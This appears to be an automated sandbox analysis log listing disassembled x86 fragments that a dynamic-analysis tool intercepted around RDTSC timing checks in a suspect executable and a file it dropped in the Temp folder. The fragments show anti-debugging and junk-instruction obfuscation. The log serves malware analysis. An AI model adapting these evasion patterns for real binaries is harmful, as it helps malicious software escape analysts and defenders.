Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54500CE second address: 5450139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E97h 0x00000009 xor esi, 0E4851AEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 mov ax, CE37h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ecx 0x0000001d pushad 0x0000001e movzx eax, dx 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 call 00007F661CE75E98h 0x0000002e pop ecx 0x0000002f mov ecx, edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450139 second address: 545013F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545013F second address: 5450143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450143 second address: 545015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D451441h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 545015F second address: 545016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54501BC second address: 54501FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661D45143Ch 0x00000011 sub ecx, 2F694A38h 0x00000017 jmp 00007F661D45143Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cl, B2h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54501FE second address: 5450E0F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F661CE75E8Bh 0x00000008 sbb cx, 97FEh 0x0000000d jmp 00007F661CE75E99h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 ret 0x00000017 nop 0x00000018 and bl, 00000001h 0x0000001b movzx eax, bl 0x0000001e lea esp, dword ptr [ebp-0Ch] 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 pop ebp 0x00000025 ret 0x00000026 add esp, 04h 0x00000029 jmp dword ptr [0086A41Ch+ebx*4] 0x00000030 push edi 0x00000031 call 00007F661CE9B887h 0x00000036 push ebp 0x00000037 push ebx 0x00000038 push edi 0x00000039 push esi 0x0000003a sub esp, 000001D0h 0x00000040 mov dword ptr [esp+000001B4h], 0086CB10h 0x0000004b mov dword ptr [esp+000001B0h], 000000D0h 0x00000056 mov dword ptr [esp], 00000000h 0x0000005d mov eax, dword ptr [008681DCh] 0x00000062 call eax 0x00000064 mov edi, edi 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F661CE75E99h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E0F second address: 5450E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451441h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E2B second address: 5450E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E2F second address: 5450E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E33 second address: 5450E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E39 second address: 5450E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E3F second address: 5450E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E43 second address: 5450E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E5C second address: 5450E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E60 second address: 5450E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E64 second address: 5450E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450E6A second address: 5450EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov si, 147Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F661D451448h 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F661D451447h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EAB second address: 5450EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EC3 second address: 5450EF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F661D451445h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5450EF2 second address: 5450F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600B6 second address: 54600D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600D3 second address: 54600D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600D9 second address: 54600DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54600DD second address: 5460130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F661CE75E99h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F661CE75E98h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460130 second address: 5460136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460136 second address: 546013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546013C second address: 5460140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5460140 second address: 546015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F668D4AB8B0h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F661CE75E8Eh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 546015F second address: 546016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601A9 second address: 54601AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54601AE second address: 546021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F661D45143Eh 0x00000010 je 00007F668DA75BF4h 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007F661D45143Dh 0x0000001e or ax, 1A46h 0x00000023 jmp 00007F661D451441h 0x00000028 popfd 0x00000029 pop ecx 0x0000002a mov edi, 606B1764h 0x0000002f popad 0x00000030 cmp dword ptr [ebp+08h], 00002000h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F661D451446h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A88 second address: 5470A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A97 second address: 5470A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A9D second address: 5470AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F661CE75E96h 0x00000011 push eax 0x00000012 jmp 00007F661CE75E8Bh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F661CE75E96h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push ecx 0x00000021 movsx edx, cx 0x00000024 pop eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470AF3 second address: 5470B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F661D45143Bh 0x00000009 pop esi 0x0000000a popad 0x0000000b popad 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B0C second address: 5470B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B10 second address: 5470B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B16 second address: 5470B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B1B second address: 5470B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, DD0Bh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B2F second address: 5470B42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B42 second address: 5470B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F661D451443h 0x00000015 or ch, 0000003Eh 0x00000018 jmp 00007F661D451449h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop edi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470B99 second address: 5470BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F661CE75E8Eh 0x00000010 je 00007F668D493683h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F661CE75E97h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470BD9 second address: 5470C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F661D451443h 0x00000018 pop esi 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D47 second address: 5470D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470D4B second address: 5470D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4A8 second address: 3DE4AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4AE second address: 3DE4D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F661D451443h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F661D451436h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 3DE4D2 second address: 3DE4E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54D771 second address: 54D77B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CC9B second address: 54CC9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CC9F second address: 54CCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE27 second address: 54CE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE2B second address: 54CE55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 ja 00007F661D451436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE55 second address: 54CE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE5D second address: 54CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D451449h 0x00000009 popad 0x0000000a jl 00007F661D451438h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F661D451445h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54CE9F second address: 54CEC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E98h 0x00000007 jnc 00007F661CE75E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F90E second address: 54F91E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F91E second address: 54F924 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F924 second address: 54F9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F661D451436h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jnp 00007F661D451448h 0x00000016 pop eax 0x00000017 mov si, 3394h 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F661D451438h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 cmc 0x00000038 push 00000000h 0x0000003a mov edx, dword ptr [ebp+122D2D2Ah] 0x00000040 push 00000003h 0x00000042 mov edi, 487D039Ch 0x00000047 xor dword ptr [ebp+122D28D7h], ecx 0x0000004d push C752CC9Fh 0x00000052 jmp 00007F661D45143Fh 0x00000057 xor dword ptr [esp], 0752CC9Fh 0x0000005e jmp 00007F661D451440h 0x00000063 lea ebx, dword ptr [ebp+124457E4h] 0x00000069 mov edi, ecx 0x0000006b xchg eax, ebx 0x0000006c pushad 0x0000006d jp 00007F661D45143Ch 0x00000073 push eax 0x00000074 push edx 0x00000075 js 00007F661D451436h 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54F9D7 second address: 54F9E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FA3E second address: 54FA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, 13C73B51h 0x00000010 push 00000000h 0x00000012 jmp 00007F661D45143Eh 0x00000017 call 00007F661D451439h 0x0000001c jmp 00007F661D451444h 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jbe 00007F661D451436h 0x0000002a jnp 00007F661D451436h 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FA8F second address: 54FAA2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FAA2 second address: 54FAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661D45143Eh 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FAB8 second address: 54FB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F661CE75E93h 0x0000000f pop edx 0x00000010 jmp 00007F661CE75E95h 0x00000015 popad 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F661CE75E94h 0x00000020 pop eax 0x00000021 mov esi, dword ptr [ebp+122D398Ch] 0x00000027 push 00000003h 0x00000029 jbe 00007F661CE75E9Bh 0x0000002f push 00000000h 0x00000031 add edi, 52C0432Ah 0x00000037 push 00000003h 0x00000039 call 00007F661CE75E89h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F661CE75E8Ch 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB4B second address: 54FB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB4F second address: 54FB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB55 second address: 54FB8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F661D451436h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jno 00007F661D45144Ch 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB8A second address: 54FB8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FB8F second address: 54FBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jp 00007F661D451451h 0x00000011 push edx 0x00000012 jmp 00007F661D451449h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FBC4 second address: 54FC07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d lea ebx, dword ptr [ebp+124457EDh] 0x00000013 mov dword ptr [ebp+122D1BF7h], edx 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b jmp 00007F661CE75E92h 0x00000020 pop eax 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jp 00007F661CE75E86h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC07 second address: 54FC0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC89 second address: 54FC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\02FQBW3AYVFKS8DMY3O.exe RDTSC instruction interceptor: First address: 54FC8F second address: 54FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F661D45143Ch 0x0000000b popad 0x0000000c nop 0x0000000d mov cl, 5Ah 0x0000000f push 00000000h 0x00000011 jnl 00007F661D451436h 0x00000017 mov dx, di 0x0000001a push 006466F4h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F661D451443h 0x00000026 rdtsc
